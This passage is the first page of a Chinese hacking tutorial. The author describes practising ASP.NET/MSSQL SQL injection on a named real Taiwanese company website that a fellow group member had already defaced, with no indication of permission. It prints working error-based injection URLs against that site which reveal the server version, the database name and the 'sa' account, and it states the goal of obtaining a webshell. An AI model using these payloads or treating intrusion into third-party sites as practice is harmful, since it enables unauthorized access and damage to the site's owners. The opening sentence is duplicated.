一次在渗透群里看到小天同学放出一个被他挂了txt的台湾站，看了下发现是个ASP.NET的整站系统，问了一下他情况，据说是权限设置有点BT，一直拿不到webshell。因为之前有看过

　　一次在渗透群里看到小天同学放出一个被他挂了txt的台湾站，看了下发现是个ASP.NET的整站系统，问了一下他情况，据说是权限设置有点BT，一直拿不到webshell。因为之前有看过一些aspx的注入教程，正好可以练练手，于是有了下面的文章。

　　一.注入检测

　　随便打开个带参数链接，加入单引号，立刻出现了错误(图1)

　　接着提交

　　http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’ and (select @@version)>0 and ’’=’

　　暴出了MS SQL SERVER的版本，确定服务器采用的是ASP.NET+MS SQLSERVER架构(图2)

　　这下好办了，依次提交下面地址。得到数据库名newkuai和当前数据库用户sa(图3)

　　http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’ and db_name()>0 and ’’=’

　　http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’ and system_user>0 and ’’=’

[1] [2] [3] 下一页